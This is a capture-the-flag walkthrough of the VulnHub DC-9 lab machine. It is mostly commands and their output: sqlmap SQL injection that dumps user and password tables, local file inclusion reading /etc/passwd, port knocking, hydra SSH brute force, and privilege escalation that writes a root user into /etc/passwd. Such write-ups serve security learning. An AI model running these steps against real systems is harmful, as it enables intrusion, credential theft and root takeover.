CTF Walk Through - DC9

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

12/01/2025 Shad Hussain Knowledge Views 89 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - DC9 - VulnHub


Machine link : https://www.vulnhub.com/entry/dc-9,412/


STEP1
arp-scan -l
FINDING
192.168.31.195
----------------------------------------------------------------------------------------------------------
STEP2
nmap 192.168.31.195 -p- -Pn -A -T4 -sSV
FINDING
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
----------------------------------------------------------------------------------------------------------
STEP3
dirb http://192.168.31.195/

FINDING
---- Scanning URL: http://192.168.31.195/ ----
== DIRECTORY: http://192.168.31.195/css/                                                                            
== DIRECTORY: http://192.168.31.195/includes/                                                                       
+ http://192.168.31.195/index.php (CODE:200|SIZE:917)                                                                
+ http://192.168.31.195/server-status (CODE:403|SIZE:279)    
----------------------------------------------------------------------------------------------------------
STEP4
http://192.168.31.195/results.php

intercept the request in burp
copy the request in .txt file
on terminal lets sqlmap the request
sqlmap -r dc9packet.txt --bds --batch
FINDING
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=asad UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871,0x446a484c415156664359744d614d
6979796c54704376496569634b5a7764656b534c495545587269,0x716b626a71),
NULL,NULL,NULL-- -
---
[01:53:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL = 5.0.12 (MariaDB fork)
[01:53:58] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
----------------------------------------------------------------------------------------------------------
STEP5
to get tables from Staff
sqlmap -r dc9packet.txt 3--level=3 -D Staff --tables
FINDING
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+
----------------------------------------------------------------------------------------------------------
STEP6
to get data form StaffDetails and Users Tables
sqlmap -r dc9packet.txt --level=3 -D Staff -T StaffDetails --columns
FINDING
Table: StaffDetails
[7 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| position  | varchar(100)    |
| email     | varchar(50)     |
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| phone     | varchar(20)     |
| reg_date  | timestamp       |
+-----------+-----------------+
sqlmap -r dc9packet.txt --level=3 -D Staff -T Users --columns
FINDING
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+
sqlmap -r dc9packet.txt --level=3 -D Staff -T Users -C Password,UserID,Username --dump
Database: Staff                                                                                                      
Table: Users
[1 entry]
+--------------------------------------------------+--------+----------+
| Password                                         | UserID | Username |
+--------------------------------------------------+--------+----------+
| 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | 1      | admin    |
+--------------------------------------------------+--------+----------+
----------------------------------------------------------------------------------------------------------
STEP7
to get tables from users
sqlmap -r dc9packet.txt 3--level=3 -D users --tables
FINDING
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
to get columns form users DATABASE
sqlmap -r dc9packet.txt --level=3 -D users -T UserDetails --columns
FINDING
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+
sqlmap -r dc9packet.txt --level=3 -D users -T UserDetails -C firstname,id,lastname,password,reg_date,username --dump
Database: users
Table: UserDetails
[17 entries]
+-----------+----+------------+---------------+---------------------+-----------+
| firstname | id | lastname   | password      | reg_date            | username  |
+-----------+----+------------+---------------+---------------------+-----------+
| Mary      | 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     |
| Julie     | 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    |
| Fred      | 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     |
| Barney    | 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   |
| Tom       | 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      |
| Jerry     | 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    |
| Wilma     | 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    |
| Betty     | 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    |
| Chandler  | 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb |
| Joey      | 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     |
| Rachel    | 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   |
| Ross      | 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     |
| Monica    | 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   |
| Phoebe    | 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   |
| Scooter   | 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    |
| Donald    | 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   |
| Scott     | 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  |
+-----------+----+------------+---------------+---------------------+-----------+
----------------------------------------------------------------------------------------------------------
STEP8
lets login with admin -- transorbital1
login in
at the bottom we find "File does not exist"
lets try LFI at http://192.168.31.195/manage.php?file=../../../../../../../etc/passwd

its work means LFI is here
----------------------------------------------------------------------------------------------------------
STEP9
http://192.168.31.195/manage.php?file=../../../../../../../etc/knockd.conf

FINDING
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn 
we find theopen ssh port is 7469,8475,9842
----------------------------------------------------------------------------------------------------------
STEP10
to open ssh port we use
knock 192.168.1.8 7469 8475 9842
then
nmap -p22 192.168.1.8
ssh port is seen open
----------------------------------------------------------------------------------------------------------
STEP11
make user.txt file form database and password.txt as well
hydra -L /root/Desktop/dc9users.txt -P /root/Desktop/dc9userspassword.txt -s 22 192.168.31.195 ssh 
FINDING
[22][ssh] host: 192.168.31.195   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.31.195   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.31.195   login: janitor   password: Ilovepeepee
----------------------------------------------------------------------------------------------------------
STEP12
ssh [email protected]
password: UrAG0D!
su janitor
password: Ilovepeepee
cd /home
cd janitor
ls -la
cd .secrets-for-putin
ls -la
cat passwords-found-on-post-it-notes.txt
FINDING
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
----------------------------------------------------------------------------------------------------------
STEP13
paste this password list in dc9userspassword2.txt and hydra it again with rest of usernames
hydra -L /root/Desktop/dc9users.txt -P /root/Desktop/dc9userspassword2.txt -s 22 192.168.31.195 ssh
FINDING
[22][ssh] host: 192.168.31.195   login: fredf   password: B4-Tru3-001
----------------------------------------------------------------------------------------------------------
STEP14
ssh [email protected]
password: B4-Tru3-001
sudo -l
FINDING
(root) NOPASSWD: /opt/devstuff/dist/test/test
----------------------------------------------------------------------------------------------------------
STEP15
create a password
openssl passwd -1 -salt shad 123456
$1$shad$XWjl/m8zVxYjY.AZYP0F3/
create a file in tmp
echo asad:$1$shad$XWjl/m8zVxYjY.AZYP0F3/:0:0::/root:/bin/bash  /tmp/raja
cd /opt/devstuff/dist/test
sudo ./test /tmp/raja /etc/passwd
su asad
password -- 123456
whoami
root
ls -la
cat theflag.txt
███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.
----------------------------------------------------------------------------------------------------------

	23.12.2024 Kaushal Kumar Readers 144
DARKEST SIDES OF WOMEN YOU DONT KNOW ❤️ 1. A woman can never love two men at the same time. It is always one. If you ar ..... Read all...

	04.01.2025 Shad Hussain Readers 126
CTF Walk Through - So Simple - VulnHub Machine Link : https://www.vulnhub.com/entry/so-simple-1,515/ STEP1 arp-sca ..... Read all...

	23.12.2024 Shad Hussain Readers 265
CTF Walk Through - DC7 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-7,356/ STEP1 nmap 192.168.3 ..... Read all...

	12.12.2024 Shad Hussain Readers 242
CTF Walk Through - OverlayFS - THM Room Link : https://tryhackme.com/r/room/overlayfs STEP1 Username: overlay ..... Read all...

	06.12.2024 Manorama Kumari Readers 379
*पति की आवश्यकता क्यों ? :: 😊😊 एक महिला एक मनोचिकित्सक के पास गई और उससे बोली कि *"मैं शादी नहीं करना चाहती.. ..... Read all...

	06.12.2024 Shad Hussain Readers 263
CTF Walk Through - DC6 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-6,315/ STEP1 arp-scan -l F ..... Read all...

	05.12.2024 Shad Hussain Readers 275
CTF Walk Through - Ice - THM Room Link : https://tryhackme.com/r/room/ice STEP1 nmap -Pn -sSV 10.10.98.2 ..... Read all...

	05.12.2024 Shad Hussain Readers 275
CTF Walk Through - LazyAdmin - THM Room Link : https://tryhackme.com/r/room/lazyadmin STEP1 nmap 10.10.87.228 ..... Read all...

	04.12.2024 Shad Hussain Readers 287
CTF Walk Through - Vulnversity - THM Room Link : https://tryhackme.com/r/room/vulnversity STEP1 nmap -p- -sSV 10 ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles